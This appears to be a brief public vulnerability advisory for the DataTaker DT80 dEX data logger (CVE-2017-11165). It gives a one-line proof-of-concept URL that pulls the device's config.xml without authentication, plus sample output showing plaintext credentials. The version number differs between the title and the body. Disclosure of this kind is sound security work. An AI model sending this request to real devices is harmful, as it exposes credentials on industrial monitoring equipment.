[+] Title: DataTaker DT80 dEX 1.50.012 - Sensitive Configurations Exposure [+] Credits / Discovery: Nassim Asrir [+] Author Contact: wassline@gmail.com || https://www.linkedin.com/in/nassim-asrir-b73a57122/ [+] Author Company: Henceforth [+] CVE: CVE-2017-11165 Vendor: =============== http://www.datataker.com/ About: ======== The dataTaker DT80 smart data logger provides an extensive array of features that allow it to be used across a wide variety of applications. The DT80 is a robust, stand alone, low power data logger featuring USB memory stick support, 18 bit resolution, extensive communications capabilities and built-in display. The dataTaker DT80as Dual Channel concept allows up to 10 isolated or 15 common referenced analog inputs to be used in many combinations. With support for multiple SDI-12 sensor networks, Modbus for SCADA systems, FTP and Web interface, 12V regulated output to power sensors, the DT80 is a totally self contained solution. Vulnerability Type: =================== Sensitive Configurations Exposure. issue: =================== dataTaker dEX 1.350.012 allows remote attackers to obtain sensitive configuration information via a direct request for the /services/getFile.cmd?userfile=config.xml URI. POC: =================== http://victim/services/getFile.cmd?userfile=config.xml Output: ======== etc.... username password 21 arrdhor arrdhor YES